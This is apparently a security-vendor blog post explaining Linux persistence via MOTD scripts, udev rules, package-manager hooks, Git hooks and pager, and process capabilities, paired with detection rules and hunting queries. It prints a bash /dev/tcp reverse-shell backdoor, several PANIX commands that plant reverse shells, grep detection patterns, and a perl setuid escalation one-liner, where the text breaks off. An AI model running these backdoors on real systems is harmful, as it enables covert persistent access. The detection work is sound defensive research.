To display messages before and after the login process, Linux uses the `/etc/issue` and the `/etc/motd` files. These messages display on the command line and will not be seen before and after a graphical login. The `/etc/issue` file is typically used to display a login message or banner, while the `/etc/motd` file generally displays issues, security policies, or messages. These messages are global and will display to all users at the command line prompt. Only a privileged user (such as root) can edit these files.\n\nIn addition to the static `/etc/motd` file, modern systems often use dynamic MOTD scripts stored in `/etc/update-motd.d/`. These scripts generate dynamic content that can be included in the MOTD, such as current system metrics, weather updates, or news headlines.\n\nThese dynamic scripts are shell scripts that execute shell commands. It is possible to create a new file within this directory or to add a backdoor to an existing one. Once the script has been granted execution permissions, it will execute every time a user logs in.\n\nRHEL derivatives do not make use of dynamic MOTD scripts in a similar way as Debian does, and are not susceptible to this technique. \n\nAn example of a backdoored `/etc/update-motd.d/` file could look like this:\n\n```\n#!/bin/sh\nnohup setsid bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'\n```\n\nLike before, MITRE does not have a specific technique related to this. Therefore we classify this technique as [T1037](https://attack.mitre.org/techniques/T1037/).\n\n### Persistence through T1037 - message of the day (MOTD)\n\nA [payload](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L1644-L1669) similar to the one presented above should be used to ensure the backdoor does not interrupt the SSH login, potentially triggering the user’s attention. 
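Existing dynamic MOTD scripts can also be triaged for content that detaches processes or opens sockets. The snippet below is a self-contained sketch; the temporary directory stands in for `/etc/update-motd.d/` and both file names are illustrative:

```shell
# Illustrative MOTD triage: flag dynamic MOTD scripts that detach
# processes or open network sockets. The temporary directory stands
# in for /etc/update-motd.d/.
MOTD_D="$(mktemp -d)"
printf '#!/bin/sh\nuptime\n' > "$MOTD_D/00-uptime"
printf '#!/bin/sh\nnohup setsid bash -c "bash -i >& /dev/tcp/192.168.1.1/2008 0>&1"\n' > "$MOTD_D/137-python-upgrades"
# Surface scripts using detach primitives or bash network redirection.
grep -rlE 'nohup|setsid|/dev/tcp/' "$MOTD_D"
```

Legitimate MOTD scripts occasionally use these primitives too, so treat matches as leads rather than verdicts.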
We can leverage PANIX to set up persistence on Debian-based systems through MOTD like so:\n\n```\n> sudo ./panix.sh --motd --default --ip 192.168.1.1 --port 2008\n> [+] MOTD backdoor established in /etc/update-motd.d/137-python-upgrades\n```\n\nTo trigger the backdoor, we can reconnect to the server via SSH or log back into the terminal.\n\n\n\nIn the image above we can see PANIX being executed, which creates the `/etc/update-motd.d/137-python-upgrades` file and marks it as executable. Next, when a user connects to SSH/console, the payload is executed, resulting in an egress network connection by the root user. This is a straightforward attack chain, and we have several layers of detections for this:\n\n| Category | Coverage |\n|----------|------------------------------------------------------|\n| File | [Message-of-the-Day (MOTD) File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_message_of_the_day_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Process Spawned from Message-of-the-Day (MOTD)](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_suspicious_process_spawned_from_motd_detected.toml) |\n| | [Suspicious Message Of The Day Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_suspicious_message_of_the_day_execution.toml) |\n| | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml) |\n| Network | [MOTD Execution Followed by Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_motd_execution_followed_by_egress_network_connection.toml) |\n| | [Egress 
Network Connection by MOTD Child](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_egress_network_connection_by_motd_child.toml) |\n\n### Hunting for T1037 - message of the day (MOTD)\n\nHunting for MOTD persistence can be conducted through ES|QL and OSQuery. We can do so by analyzing file creations in these directories and executions from MOTD parent processes. We created the [Persistence via Message-of-the-Day](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_message_of_the_day.toml) rule to aid in this endeavor.\n\n## T1546 - event triggered execution: udev\n\n[Udev](https://man7.org/linux/man-pages/man7/udev.7.html) is the device manager for the Linux kernel, responsible for managing device nodes in the `/dev` directory. It dynamically creates or removes device nodes, manages permissions, and handles various events triggered by device state changes. Essentially, Udev acts as an intermediary between the kernel and user space, ensuring that the operating system appropriately handles hardware changes.\n\nWhen a new device is added to the system (such as a USB drive, keyboard, or network interface), Udev detects this event and applies predefined rules to manage the device. Each rule consists of key-value pairs that match device attributes and actions to be performed. Udev rules files are processed in lexical order, and rules can match various device attributes, including device type, kernel name, and more. Udev rules are defined in text files within a default set of directories:\n\n* `/etc/udev/rules.d/`\n* `/run/udev/rules.d/`\n* `/usr/lib/udev/rules.d/`\n* `/usr/local/lib/udev/rules.d/`\n* `/lib/udev/`\n\nPriority is determined by the source directory of the rule file, following the order listed above (`/etc/` → `/run/` → `/usr/`). When a rule matches, it can trigger a wide range of actions, including executing arbitrary commands or scripts. 
This flexibility makes Udev a potential vector for persistence by malicious actors. An example Udev rule looks like the following:\n\n```\nSUBSYSTEM==\"block\", ACTION==\"add|change\", ENV{DM_NAME}==\"ubuntu--vg-ubuntu--lv\", SYMLINK+=\"disk/by-dname/ubuntu--vg-ubuntu--lv\"\n```\n\nTo leverage this method for persistence, root privileges are required. Once a rule file is created, the rules need to be reloaded.\n\n```\nsudo udevadm control --reload-rules\n```\n\nTo test the rule, either perform the action specified in the rule file or use the [udevadm](https://www.man7.org/linux/man-pages/man8/udevadm.8.html) trigger utility.\n\n```\nsudo udevadm trigger -v\n```\n\nAdditionally, udev events can be monitored using `udevadm`, by running:\n\n```\nudevadm monitor --environment\n```\n\nEder’s [blog](https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/) titled “Leveraging Linux udev for persistence” is a very good read for more information on this topic. This technique has several limitations, making it more difficult to leverage as a persistence mechanism.\n\n* Udev rules are limited to short foreground tasks due to potential blocking of subsequent events.\n* They cannot execute programs accessing networks or filesystems, enforced by `systemd-udevd.service`'s sandbox.\n* Long-running processes are terminated after event handling.\n\nDespite these restrictions, bypasses include creating detached processes outside udev rules for executing implants, such as:\n\n* Leveraging `at`/`cron`/`systemd` for independent scheduling.\n* Injecting code into existing processes.\n\nAlthough persistence is ultimately established through a different technique than udev, udev still provides the trigger for the `at`/`cron`/`systemd` persistence mechanism. 
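Since command execution in udev rules goes through the `RUN+=` key, a simple way to surface candidate rules is to grep for it. The snippet below is a self-contained sketch; the temporary directory stands in for `/etc/udev/rules.d/` and the rule files are illustrative:

```shell
# Hedged hunting sketch: udev rules that execute commands carry a
# RUN+= key. The temporary directory stands in for /etc/udev/rules.d/
# and the rule file names are illustrative.
RULES_D="$(mktemp -d)"
printf 'SUBSYSTEM=="block", ACTION=="add", RUN+="/usr/bin/atest"\n' > "$RULES_D/10-atest.rules"
printf 'KERNEL=="sda", SYMLINK+="disk/by-dname/root"\n' > "$RULES_D/60-persistent-storage.rules"
# List only the rule files that execute a command on a device event.
grep -rl 'RUN+=' "$RULES_D"
```

On a live system, running the same `grep` across all the rule directories listed earlier surfaces every rule that executes a command; many are legitimate, so each hit needs review.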
MITRE does not have a technique dedicated to this mechanism — the most logical technique to add this to would be [T1546](https://attack.mitre.org/techniques/T1546/).\n\nResearchers from AON recently discovered malware called \"sedexp\" that achieves persistence using Udev rules - a technique rarely seen in the wild - so be sure to check out [their research article](https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp).\n\n### Persistence through T1546 - udev\n\nPANIX allows you to test all three techniques by leveraging `--at`, `--cron` and `--systemd`, respectively. Or go ahead and test it manually. We can set up udev persistence through `at`, by running the following command:\n\n```\n> sudo ./panix.sh --udev --default --ip 192.168.1.1 --port 2009 --at\n```\n\nTo trigger the payload, you can either run `sudo udevadm trigger` or reboot the system. Let’s analyze the events in Discover.\n\n\n\nIn the figure above, PANIX is executed, which creates the `/usr/bin/atest` backdoor and grants it execution permissions. Subsequently, the `10-atest.rules` file is generated, and the udev rules are reloaded and triggered. This causes `at` to be spawned as a child process of `udevadm`, creating the `atspool`/`atjob`, and subsequently executing the reverse shell.\n\nCron follows a similar structure; however, it is slightly more difficult to catch the malicious activity, as the child process of `udevadm` is `bash`, which is not unusual.\n\n\n\nFinally, when looking at the documents generated by Udev in combination with Systemd, we see the following:\n\n\n\nThese documents also do not show a relationship with udev, other than the `12-systemdtest.rules` file that is created. \n\nAs a result, these last two mechanisms are detected through our previous systemd/cron related rules, rather than specific udev rules. 
Let’s take a look at the coverage (We omitted the `systemd`/`cron` rules, as these were already mentioned in [the previous persistence blog](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms)):\n\n| Category | Coverage |\n|----------|------------------------------------------------------|\n| File | [Systemd-udevd Rule File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_udev_rule_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [At Utility Launched through Udevadm](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_at_utility_launched_through_udevadm.toml) |\n| | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml) |\n| Network | [Udev Execution Followed by Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_udev_execution_followed_by_egress_network_connection.toml) |\n\n### Hunting for T1546 - udev\n\nHunting for Udev persistence can be conducted through ES|QL and OSQuery. By leveraging ES|QL, we can detect unusual file creations and process executions, and through OSQuery we can do live hunting on our managed systems. To get you started, we created the [Persistence via Udev](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_udev.toml) rule, containing several different queries.\n\n## T1546.016 - event triggered execution: installer packages\n\nPackage managers are tools responsible for installing, updating, and managing software packages. 
Three widely used package managers are [APT](https://linux.die.net/man/8/apt) (Advanced Package Tool), [YUM](https://man7.org/linux/man-pages/man8/yum.8.html) (Yellowdog Updater, Modified), and YUM’s successor, [DNF](https://man7.org/linux/man-pages/man8/dnf.8.html) (Dandified YUM). Beyond their legitimate uses, these tools can be leveraged by attackers to establish persistence on a system by hijacking the package manager execution flow, ensuring malicious code is executed during routine package management operations. MITRE details information related to this technique under the identifier [T1546.016](https://attack.mitre.org/techniques/T1546/016/).\n\n### T1546.016 - installer packages (APT)\n\n[APT](https://linux.die.net/man/8/apt) is the default package manager for Debian-based Linux distributions like Debian, Ubuntu, and their derivatives. It simplifies the process of managing software packages and dependencies. APT utilizes several configuration mechanisms to customize its behavior and enhance package management efficiency. \n\n[APT hooks](https://manpages.debian.org/testing/apt/apt.conf.5.en.html) allow users to execute scripts or commands at specific points during package installation, removal, or upgrade operations. These hooks are stored in `/etc/apt/apt.conf.d/` and can be leveraged to execute actions pre- and post-installation. The structure of APT configuration files follows a numeric ordering convention to control the application of configuration snippets that customize various aspects of APT's behavior. 
A regular APT hook looks like this:\n\n```\nDPkg::Post-Invoke {\"if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true\";}; APT::Update::Post-Invoke-Success {\"/usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true\";}; \n```\n\nThese configuration files can be exploited by attackers to execute malicious binaries or code whenever an APT operation is executed. This vulnerability extends to automated processes like auto-updates, enabling persistent execution on systems with automatic update features enabled.\n\n#### Persistence through T1546.016 - installer packages (APT)\n\nTo test this method, a Debian-based system that uses APT (or a manual installation of APT) is required. If you perform this step manually, make sure you do not break the APT package manager, as [a carefully crafted payload](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2021C4-L2021C138) that detaches and runs in the background is necessary so as not to interrupt the execution chain. You can set up APT persistence by running:\n\n```\n> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --apt\n> [+] APT persistence established\n```\n\nTo trigger the payload, run an APT command, such as `sudo apt update`. This will spawn a reverse shell. Let’s take a look at the events in Discover:\n\n*Figure: APT persistence establishment*\n\nIn the figure above, we see PANIX being executed, creating the `01python-upgrades` file, and successfully establishing the APT hook. After running `sudo apt update`, APT reads the configuration file and executes the payload, initiating the `sh` → `nohup` → `setsid` → `bash` reverse shell chain. 
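For reference, a minimal hook of the kind PANIX plants could look like the snippet below. The file name and logged command are illustrative stand-ins, not the actual PANIX payload:

```
// Hypothetical /etc/apt/apt.conf.d/99-demo (benign stand-in for a malicious hook)
APT::Update::Pre-Invoke { "logger apt-hook-fired"; };
```

Anything placed in `Pre-Invoke` or `Post-Invoke` runs as root every time APT executes, which is what makes this location attractive for persistence.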
Our coverage is multi-layered, and detects the following events:\n\n| Category | Coverage |\n|----------|---------------------------------------------------|\n| File | [APT Package Manager Configuration File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_apt_package_manager_file_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Suspicious APT Package Manager Execution](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_apt_package_manager_execution.toml) |\n| | [APT Package Manager Command Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_apt_package_manager_command_execution.toml) |\n| Network | [Suspicious APT Package Manager Network Connection](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_apt_package_manager_netcon.toml) |\n| | [APT Package Manager Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_apt_package_manager_egress_network_connection.toml) |\n\n### T1546.016 - installer packages (YUM)\n\n[YUM](https://man7.org/linux/man-pages/man8/yum.8.html) (Yellowdog Updater, Modified) is the default package management system used in Red Hat-based Linux distributions like CentOS and Fedora. YUM employs [plugin architecture](https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/deployment_guide/sec-yum_plugins) to extend its functionality, allowing users to integrate custom scripts or programs that execute at various stages of the package management lifecycle. 
These plugins are stored in specific directories and can perform actions such as logging, security checks, or custom package handling.\n\nThe structure of YUM plugins typically involves placing them in directories like:\n\n* `/etc/yum/pluginconf.d/` (for configuration files)\n* `/usr/lib/yum-plugins/` (for plugin scripts)\n\nFor plugins to be enabled, the `/etc/yum.conf` file must have `plugins=1` set. These plugins can intercept YUM operations, modify package installation behaviors, or execute additional actions before or after package transactions. The YUM plugin API is quite extensive, but a basic YUM plugin template might look like [this](http://yum.baseurl.org/wiki/WritingYumPlugins.html):\n\n```\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\n\nrequires_api_version = '2.3'\nplugin_type = (TYPE_CORE, TYPE_INTERACTIVE)\n\ndef init_hook(conduit):\n conduit.info(2, 'Hello world')\n\ndef postreposetup_hook(conduit):\n raise PluginYumExit('Goodbye')\n```\n\nEach plugin must be enabled through a `.conf` configuration file:\n\n```\n[main]\nenabled=1\n```\n\nSimilar to APT's configuration files, YUM plugins can be leveraged by attackers to execute malicious code during routine package management operations, particularly during automated processes like system updates, thereby establishing persistence on vulnerable systems.\n\n#### Persistence through T1546.016 - installer packages (YUM)\n\nSimilar to APT, YUM plugins should be crafted carefully so as not to interfere with the YUM update execution flow. 
Use [this example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2025-L2047) or set it up by running:\n\n```\n> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --yum\n[+] Yum persistence established\n```\n\nAfter planting the persistence mechanism, a command similar to `sudo yum upgrade` can be run to establish a reverse connection.\n\n*Figure: YUM persistence establishment*\n\nWe see PANIX being executed and `/usr/lib/yumcon`, `/usr/lib/yum-plugins/yumcon.py`, and `/etc/yum/pluginconf.d/yumcon.conf` being created. `/usr/lib/yumcon` is executed by `yumcon.py`, which is enabled in `yumcon.conf`. After updating the system, the reverse shell execution chain (`yum` → `sh` → `setsid` → `yumcon` → `python`) is executed. Similar to APT, our YUM coverage is multi-layered, and detects the following events:\n\n| Category | Coverage |\n|----------|-------------------------------------------------------|\n| File | [Yum Package Manager Plugin File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Yum/DNF Plugin Status Discovery](https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_yum_dnf_plugin_detection.toml) |\n| Network | [Egress Connection by a YUM Package Manager Descendant](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_egress_connection_by_a_yum_package_manager_descendant.toml) |\n\n### T1546.016 - installer packages (DNF)\n\n[DNF](https://man7.org/linux/man-pages/man8/dnf.8.html) (Dandified YUM) is the next-generation package manager used in modern Red Hat-based Linux distributions, including Fedora and CentOS. It replaces YUM while maintaining compatibility with YUM repositories and packages. 
Similar to YUM, DNF utilizes a [plugin system](https://docs.redhat.com/it/documentation/red_hat_enterprise_linux/9/html/managing_software_with_the_dnf_tool/assembly_configuring-yum_managing-software-with-the-dnf-tool#proc_enabling-and-disabling-yum-plug-ins_assembly_configuring-yum) to extend its functionality, enabling users to integrate custom scripts or programs that execute at key points in the package management lifecycle.\n\nDNF plugins enhance its capabilities by allowing customization and automation beyond standard package management tasks. These plugins are stored in specific directories:\n\n* `/etc/dnf/pluginconf.d/` (for configuration files)\n* `/usr/lib/python3.9/site-packages/dnf-plugins/` (for plugin scripts)\n\nOf course, the location of the DNF plugins is bound to the Python version running on your system. Similarly to YUM, to enable a plugin, `plugins=1` must be set in `/etc/dnf/dnf.conf`. An example of a DNF plugin can look like this:\n\n```\nimport dbus\nimport dnf\nfrom dnfpluginscore import _\n\nclass NotifyPackagekit(dnf.Plugin):\n\tname = \"notify-packagekit\"\n\n\tdef __init__(self, base, cli):\n\t\tsuper(NotifyPackagekit, self).__init__(base, cli)\n\t\tself.base = base\n\t\tself.cli = cli\n\tdef transaction(self):\n\t\ttry:\n\t\t\tbus = dbus.SystemBus()\n\t\t\tproxy = bus.get_object('org.freedesktop.PackageKit', '/org/freedesktop/PackageKit')\n\t\t\tiface = dbus.Interface(proxy, dbus_interface='org.freedesktop.PackageKit')\n\t\t\tiface.StateHasChanged('posttrans')\n\t\texcept:\n\t\t\tpass \n```\n\nAs with YUM, each plugin must be enabled through a `.conf` configuration file:\n\n```\n[main]\nenabled=1\n```\n\nSimilar to YUM's plugins and APT's configuration files, DNF plugins can be exploited by malicious actors to inject and execute unauthorized code during routine package management tasks. 
This attack vector extends to automated processes such as system updates, enabling persistent execution on systems with DNF-enabled repositories.\n\n#### Persistence through T1546.016 - installer packages (DNF)\n\nSimilar to APT and YUM, DNF plugins should be crafted carefully so as not to interfere with the DNF update execution flow. You can use the following [example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2049-L2069) or set it up by running:\n\n```\n> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2013 --dnf\n> [+] DNF persistence established\n```\n\nRunning a command similar to `sudo dnf update` will trigger the backdoor. Take a look at the events:\n\n*Figure: DNF persistence establishment*\n\nAfter the execution of PANIX, `/usr/lib/python3.9/site-packages/dnfcon`, `/etc/dnf/plugins/dnfcon.conf`, and `/usr/lib/python3.9/site-packages/dnf-plugins/dnfcon.py` are created, and the backdoor is established. These locations are dynamic, based on the Python version in use. After triggering it through the `sudo dnf update` command, the `dnf` → `sh` → `setsid` → `dnfcon` → `python` reverse shell chain is initiated. 
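Before turning to the prebuilt hunting rules, a quick ad-hoc check is possible with OSQuery. A query along these lines (using the plugin configuration paths discussed above) lists the plugin configuration files and their modification times:

```
SELECT path, mtime, size
FROM file
WHERE directory IN ('/etc/yum/pluginconf.d', '/etc/dnf/pluginconf.d');
```

Comparing the `mtime` values against known administration windows can help spot configurations planted outside of regular package management work.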
Similar to before, our DNF coverage is multi-layered, and detects the following events:\n\n| Category | Coverage |\n|----------|-------------------------------------------------------|\n| File | [DNF Package Manager Plugin File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml)|\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Yum/DNF Plugin Status Discovery](https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_yum_dnf_plugin_detection.toml) |\n| Network | [Egress Connection by a DNF Package Manager Descendant](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_egress_connection_by_a_dnf_package_manager_descendant.toml) |\n\n### Hunting for persistence through T1546.016 - installer packages\n\nHunting for Package Manager persistence can be conducted through ES|QL and OSQuery. Indicators of compromise may include configuration and plugin file creations/modifications and unusual executions of APT/YUM/DNF parents. The [Persistence via Package Manager](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_package_manager.toml) rule contains several ES|QL/OSQuery queries that you can use to detect these abnormalities.\n\n## T1546 - event triggered execution: Git \n\n[Git](https://manpages.debian.org/stretch/git-man/git.1.en.html) is a distributed version control system widely used for managing source code and coordinating collaborative software development. It tracks changes to files and enables efficient team collaboration across different locations. This makes Git a system that is present in a lot of organizations across both workstations and servers. 
Two functionalities that can be (ab)used for arbitrary code execution are [Git hooks](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) and [Git pager](https://www.mslinn.com/git/200-git-pager.html). MITRE has no specific technique attributed to these persistence mechanisms, but they would best fit [T1546](https://attack.mitre.org/techniques/T1546/).\n\n### T1546 - event triggered execution: Git hooks\n\n[Git hooks](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) are scripts that Git executes before or after specific events such as commits, merges, and pushes. These hooks are stored in the `.git/hooks/` directory within each Git repository. They provide a mechanism for customizing and automating actions during the Git workflow. Common Git hooks include `pre-commit`, `post-commit`, `pre-merge`, and `post-merge`.\n\nAn example of a Git hook would be the file `.git/hooks/pre-commit`, with the following contents:\n\n```\n#!/bin/sh\n# Check if this is the initial commit\nif git rev-parse --verify HEAD >/dev/null 2>&1\nthen\n echo \"pre-commit: About to create a new commit...\"\n against=HEAD\nelse\n echo \"pre-commit: About to create the first commit...\"\n against=4b825dc642cb6eb9a060e54bf8d69288fbee4904\nfi\n```\n\nAs these scripts are executed on specific actions, and the contents of the scripts can be changed in whatever way the user wants, this method can be abused for persistence. Additionally, this method does not require root privileges, making it a convenient persistence technique for instances where root privileges are not yet obtained. These scripts can also be added to Github repositories prior to cloning, turning them into initial access vectors as well. \n\n### T1546 - event triggered execution: git pager\n\nA [pager](https://en.wikipedia.org/wiki/Terminal_pager) is a program used to view content one screen at a time. It allows users to scroll through text files or command output without the text scrolling off the screen. 
Common pagers include [less](https://www.commandlinux.com/man-page/man1/pager.1.html), [more](https://man7.org/linux/man-pages/man1/more.1.html), and [pg](https://man7.org/linux/man-pages/man1/pg.1.html). A [Git pager](https://www.mslinn.com/git/200-git-pager.html) is a specific use of a pager program to display the output of Git commands. Git allows users to configure a pager to control the display of commands such as `git log`.\n\nGit determines which pager to use through the following order of configuration:\n\n* `/etc/gitconfig` (system-wide)\n* `~/.gitconfig` or `~/.config/git/config` (user-specific)\n* `.git/config` (repository specific)\n\nA typical configuration where a pager is specified might look like this:\n\n```\n[core]\n pager = less\n```\n\nIn this example, Git is configured to use less as the pager. When a user runs a command like `git log`, Git will pipe the output through less for easier viewing. The flexibility in specifying a pager can be exploited. For example, an attacker can set the pager to a command that executes arbitrary code. This can be done by modifying the `core.pager` configuration to include malicious commands. Let’s take a look at the two techniques discussed in this section. \n\n### Persistence through T1546 - Git\n\nTo test these techniques, the system requires a cloned Git repository. There is no point in setting up a custom repository, as the persistence mechanism depends on user actions, making a hidden and unused Git repository an illogical construct. 
You could initialize your own hidden repository and chain it together with a `cron`/`systemd`/`udev` persistence mechanism to initialize the repository on set intervals, but that is out of scope for now.\n\nTo test the Git Hook technique, ensure a Git repository is available on the system, and run:\n\n```\n> ./panix.sh --git --default --ip 192.168.1.1 --port 2014 --hook\n> [+] Created malicious pre-commit hook in /home/ruben/panix\n```\n\nThe program loops through the entire filesystem (as far as this is possible, based on permissions), finds all of the repositories, and backdoors them. To trigger the backdoor, run `git add -A` and `git commit -m \"backdoored!\"`. This will generate the following events:\n\n\n\nIn this figure we see PANIX looking for Git repositories, adding a `pre-commit` hook, and granting it execution permissions, successfully planting the backdoor. Next, the backdoor is triggered through the `git commit`, and the `git` → `pre-commit` → `nohup` → `setsid` → `bash` reverse shell connection is initiated.\n\nTo test the Git pager technique, ensure a Git repository is available on the system and run: \n\n```\n> ./panix.sh --git --default --ip 192.168.1.1 --port 2015 --pager\n> [+] Updated existing Git config with malicious pager in /home/ruben/panix\n> [+] Updated existing global Git config with malicious pager \n```\n\nTo trigger the payload, move into the backdoored repository and run a command such as `git log`. This will trigger the following events:\n\n\n\nPANIX executes and starts searching for Git repositories. Once found, the configuration files are updated or created, and the backdoor is planted. Invoking the Git Pager (`less`) executes the backdoor, setting up the `git` → `sh` → `nohup` → `setsid` → `bash` reverse connection chain. 
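The hook trigger is easy to reproduce harmlessly in a scratch repository. The sketch below is a benign stand-in for the PANIX payload, with a file write in place of a reverse shell:

```shell
# Create a throwaway repository with a benign pre-commit hook (demo only)
repo=$(mktemp -d)
cd "$repo"
git init -q .
cat > .git/hooks/pre-commit <<'EOF'
#!/bin/sh
# An attacker's payload would run here; we just leave a marker
echo "hook executed" > hook-proof.txt
EOF
chmod +x .git/hooks/pre-commit

# Any commit now runs the hook, just like a PANIX-planted one
git -c user.email=demo@example.com -c user.name=demo \
    commit -q --allow-empty -m "trigger"
cat hook-proof.txt
```

Because the hook fires on every commit and its contents are entirely attacker-controlled, swapping the marker for a reverse shell yields the exact execution chain shown in the figure above.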
\n\nWe have several layers of detection, covering the Git Hook/Pager persistence techniques.\n\n| Category | Coverage |\n|----------|-----------------------------------------------------|\n| File | [Git Hook Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_file_creation.toml) |\n| Process | [Git Hook Child Process](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_process_execution.toml) |\n| | [Git Hook Command Execution](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_execution.toml) |\n| | [Linux Restricted Shell Breakout via Linux Binary(s)](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_evasion_linux_binary.toml) |\n| Network | [Git Hook Egress Network Connection](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_netcon.toml) |\n\n### Hunting for persistence through T1546 - Git\n\nHunting for Git Hook/Pager persistence can be conducted through ES|QL and OSQuery. Potential indicators include file creations in the `.git/hooks/` directories, Git Hook executions, and the modification/creation of Git configuration files. The [Git Hook/Pager Persistence](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_git_hook_pager.toml) hunting rule has several ES|QL and OSQuery queries that will aid in detecting this technique.\n\n## T1548 - abuse elevation control mechanism: process capabilities\n\n[Process capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) are a fine-grained access control mechanism that allows the division of the root user's privileges into distinct units. These capabilities can be independently enabled or disabled for processes, and are used to enhance security by limiting the privileges of processes. 
Instead of granting a process full root privileges, only the necessary capabilities are assigned, reducing the risk of exploitation. This approach follows the principle of least privilege.\n\nTo better understand them, some use cases for process capabilities are e.g. assigning `CAP_NET_BIND_SERVICE` to a web server that needs to bind to port 80, assigning `CAP_NET_RAW` to tools that need access to network interfaces or assigning `CAP_DAC_OVERRIDE` to backup software requiring access to all files. By leveraging these capabilities, processes are capable of performing tasks that are usually only possible with root access.\n\nWhile process capabilities were developed to enhance security, once root privileges are acquired, attackers can abuse them to maintain persistence on a compromised system. By setting specific capabilities on binaries or scripts, attackers can ensure their malicious processes can operate with elevated privileges and allow for an easy way back to root access in case of losing it. Additionally, misconfigurations may allow attackers to escalate privileges. \n\nSome process capabilities can be (ab)used to establish persistence, escalate privileges, access sensitive data, or conduct other tasks. Process capabilities that can do this include, but are not limited to:\n\n* `CAP_SYS_MODULE` (allows loading/unloading of kernel modules)\n* `CAP_SYS_PTRACE` (enables tracing and manipulation of other processes)\n* `CAP_DAC_OVERRIDE` (bypasses read/write/execute checks)\n* `CAP_DAC_READ_SEARCH` (grants read access to any file on the system)\n* `CAP_SETUID`/`CAP_SETGID` (manipulate UID/GID)\n* `CAP_SYS_ADMIN` (to be honest, this just means root access)\n\nA simple way of establishing persistence is to grant the process `CAP_SETUID` or `CAP_SETGID` capabilities (this is similar to setting the `SUID`/`SGID` bit to a process, which we discussed in [the previous persistence blog](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms)). 
But any of the capabilities above can be used, so be a bit creative here! MITRE does not have a technique dedicated to process capabilities. Similar to Setuid/Setgid, this technique can be leveraged for both privilege escalation and persistence. The most logical technique to add this mechanism to (based on the existing structure of the MITRE ATT&CK framework) would be [T1548](https://attack.mitre.org/techniques/T1548/). \n\n### Persistence through T1548 - process capabilities\n\nLet’s leverage PANIX to set up a process with `CAP_SETUID` process capabilities by running:\n\n```\n> sudo ./panix.sh --cap --default\n[+] Capability setuid granted to /usr/bin/perl\n[-] ruby, is not present on the system.\n[-] php is not present on the system.\n[-] python is not present on the system.\n[-] python3, is not present on the system.\n[-] node is not present on the system. \n```\n\nPANIX will by default check a list of binaries that are easily exploitable after granting `CAP_SETUID` capabilities. You can use `--custom` and specify `--capability` and `--binary` to test some of your own. \n\nIf your system has `Perl`, you can take a look at [GTFOBins](https://gtfobins.github.io/gtfobins/perl/) to find out how to escalate privileges with this capability set. \n\n```\n/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec 